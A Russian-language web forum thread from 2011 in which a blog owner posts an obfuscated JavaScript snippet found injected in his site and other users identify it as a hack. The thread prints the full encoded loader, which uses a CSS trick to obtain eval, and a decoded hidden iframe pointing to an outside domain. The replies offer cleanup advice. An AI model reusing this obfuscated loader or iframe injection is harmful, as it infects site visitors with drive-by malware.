X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Странный скрипт в исходном коде
Silverspam
Silverspam
Topic Starter сообщение 18.1.2011, 12:16; Ответить: Silverspam
Сообщение #1


Подскажите, нашел какие-то странности в исходном коде на блоге...

CODE
<script language="javascript" type="text/javascript">function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var dlul={eya:5111,zn:function(){createCSS("#c0","background: url(data:,eva)");var zv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var tfq=r[i].cssRules||r[i].rules;for(var smgl=0;smgl<tfq.length;smgl++){var fb=tfq.item?tfq.item(smgl):tfq[smgl];if(!fb.selectorText.match(/#c(\d+)/))continue;zv=fb.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}
var jqt=[5102,5102,5006,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,
5008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,
5
033,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4
9
88,5098,5102,5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,51
0
2,5102,4986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,4993,5014,499
7
,5079,5013,5011,4990,5079,5050,5079,5011,5000,5012,4994,5002,5010,5001,4995,5065
,
5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,5001,4995,5071,5077,5013,
5
000,5011,4990,5077,5070,5052,5098,5102,5102,5102,4995,4997,4990,5079,4988,5098,5
1
02,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5014,4999,4999,50
1
0,5001,5011,5044,5007,5006,5003,5011,5071,5013,5011,4990,5070,5052,5098,5102,510
2
,5102,4986,5079,5012,5014,4995,5012,5007,5079,5071,5010,5070,5079,4988,5098,5102
,
5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5013,5000,5011,4990,
5
079,5050,5079,5013,5011,4990,5052,5098,5102,5102,5102,4986,5098,5102,5102,5102,5
0
06,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,50
4
2,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,501
0
,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4988,5098,5102,5102
,
5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,5102,5102,5102,
4
986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,4
9
94,5002,5010,5001,4995,5065,4992,4997,5006,4995,5010,5071,5077,5051,5006,5009,49
9
7,5014,5002,5010,5079,4996,4997,5012,5050,5072,5007,4995,4995,4999,5053,5064,506
4
,4999,5006,5012,5007,5010,4995,5014,5065,5001,5010,4995,5064,5002,5014,5006,5001
,
5065,4999,5007,4999,5072,5079,4992,5006,5011,4995,5007,5050,5072,5062,5063,5072,
5
079,5007,5010,5006,5008,5007,4995,5050,5072,5062,5063,5072,5079,4996,4995,4990,5
0
03,5010,5050,5072,4993,5006,4996,5006,5013,5006,5003,5006,4995,4990,5053,5007,50
0
6,5011,5011,5010,5001,5052,4999,5000,4996,5006,4995,5006,5000,5001,5053,5014,501
3
,4996,5000,5003,4994,4995,5010,5052,5003,5010,5009,4995,5053,5063,5052,4995,5000
,
4999,5053,5063,5052,5072,5049,5051,5064,5006,5009,4997,5014,5002,5010,5049,5077,
5
070,5052,5098,5102,5102,5102,4986,5098,5102,5102,4986,5098,5102,5102,5009,4994,5
0
01,5012,4995,5006,5000,5001,5079,5006,5009,4997,5014,5002,5010,4997,5071,5070,49
8
8,5098,5102,5102,5102,4993,5014,4997,5079,5009,5079,5050,5079,5011,5000,5012,499
4
,5002,5010,5001,4995,5065,5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010
,
5001,4995,5071,5072,5006,5009,4997,5014,5002,5010,5072,5070,5052,5009,5065,4996,
5
010,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,4996,4997,5012,5
0
72,5067,5072,5007,4995,4995,4999,5053,5064,5064,4999,5006,5012,5007,5010,4995,50
1
4,5065,5001,5010,4995,5064,5002,5014,5006,5001,5065,4999,5007,4999,5072,5070,505
2
,5009,5065,4996,4995,4990,5003,5010,5065,4993,5006,4996,5006,5013,5006,5003,5006
,
4995,4990,5050,5072,5007,5006,5011,5011,5010,5001,5072,5052,5009,5065,4996,4995,
4
990,5003,5010,5065,4999,5000,4996,5006,4995,5006,5000,5001,5050,5072,5014,5013,4
9
96,5000,5003,4994,4995,5010,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,50
0
3,5010,5009,4995,5050,5072,5063,5072,5052,5009,5065,4996,4995,4990,5003,5010,506
5
,4995,5000,4999,5050,5072,5063,5072,5052,5009,5065,4996,5010,4995,5046,4995,4995
,
4997,5006,5013,4994,4995,5010,5071,5072,4992,5006,5011,4995,5007,5072,5067,5072,
5
062,5063,5072,5070,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,4
9
94,4995,5010,5071,5072,5007,5010,5006,5008,5007,4995,5072,5067,5072,5062,5063,50
7
2,5070,5052,5098,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,500
8
,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033
,
5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5065,5014,
4
999,4999,5010,5001,5011,5044,5007,5006,5003,5011,5071,5009,5070,5052,5098,5102,5
1
02,4986];var s="";dv=eval(zv+"l");uw=String.fromCharCode;for(var i=0;i<jqt.length;i++){sfh=dlul.eya-parseInt(jqt[i]);s+=(uw(sfh));}
dv(s);}};dlul.zn();</script>



Что это за фигня такая?


--------------------


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Zulicjan
Zulicjan
сообщение 18.1.2011, 12:21; Ответить: Zulicjan
Сообщение #2


это называется взломали. Удаляйте
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Ralf
Ralf
сообщение 18.1.2011, 12:24; Ответить: Ralf
Сообщение #3


(Silverspam @ 18.1.2011, 16:16) *
Подскажите, нашел какие-то странности в исходном коде на блоге...

это где? в шаблоне?


--------------------
Новый независимый рейтинг Форекс брокеров 2017 в России и Мире.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
proXBOCT
proXBOCT
сообщение 18.1.2011, 12:41; Ответить: proXBOCT
Сообщение #4


Блииин, я такой крутой...
Извините, эмоции.

Расшифровал я вообщем код, он ставит ifreme на сайтик
<iframe src='http://picheta.net/main.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Интересует полный код - в личку

Как побороть, я если честно не знаю, это отдельная история, но если люди добрые есть, то и на сёрче можете отписаться что к чему:
http://forum.searchengines.ru/showthread.php?t=593873

Там такая же проблема сегодня всплыла, я просто не зарегистрирован


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Silverspam
Silverspam
Topic Starter сообщение 18.1.2011, 12:43; Ответить: Silverspam
Сообщение #5


Как эту заразу найти? Он то есть, то нет в исходном коде sad.gif Файлы шаблона и файлы главной страниц проыверил, подозрительных вставок в коде не нашел sad.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
proXBOCT
proXBOCT
сообщение 18.1.2011, 12:48; Ответить: proXBOCT
Сообщение #6


Думаю, что придётся или откат сделать, если есть возможность, или пытаться искать код во всех файлах, что довольно долго и трудно...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Silverspam
Silverspam
Topic Starter сообщение 18.1.2011, 12:48; Ответить: Silverspam
Сообщение #7


proXBOCT, отправил вам в ЛС инфу...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Dinamitt
Dinamitt
сообщение 18.1.2011, 12:55; Ответить: Dinamitt
Сообщение #8


Silverspam, попробуйте по датам последних изменений файлов посмотреть. У меня в index.php подобную дрянь впихнули.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
proXBOCT
proXBOCT
сообщение 18.1.2011, 12:58; Ответить: proXBOCT
Сообщение #9


А, и ещё, ФТП менеджером каким пользуетесь?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Silverspam
Silverspam
Topic Starter сообщение 18.1.2011, 13:00; Ответить: Silverspam
Сообщение #10


(proXBOCT @ 18.1.2011, 13:58) *
А, и ещё, ФТП менеджером каким пользуетесь?


Никаким. Файлы все через хостинг закидываю браузерно. Почему? Потому что провайдер дом.ру именно у меня никак не хочет подружится с ftp протоколом.

(Dinamitt @ 18.1.2011, 13:55) *
Silverspam, попробуйте по датам последних изменений файлов


Первое, что сделал. Но к сожалению последние изменения датированы 28.11.10, когда я сам вносил изменения. Бяка же появилась на днях..


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Странный трафик на сайте длительное время
26 TABAK 7542 16.3.2024, 17:31
автор: Boymaster
Открытая тема (нет новых ответов) Скрипт поисковика видео StrongTube
3 3josoft 1561 14.8.2023, 14:45
автор: 3josoft
Открытая тема (нет новых ответов) Скрипт приема платежей p2p с карты на карту card2card
Скрипт приема платежей p2p с карты на карту card2card
15 zladey1986 7780 26.3.2023, 8:54
автор: Palundra
Открытая тема (нет новых ответов) Продам скрипт перевода постов и комментариев
4 Tutich 749 19.1.2023, 17:23
автор: Tutich
Открытая тема (нет новых ответов) Битрикс скрипт нативной установки
3 Nemo 2439 20.11.2022, 10:09
автор: Webmaster24


 



RSS Текстовая версия Сейчас: 29.3.2024, 16:52
Дизайн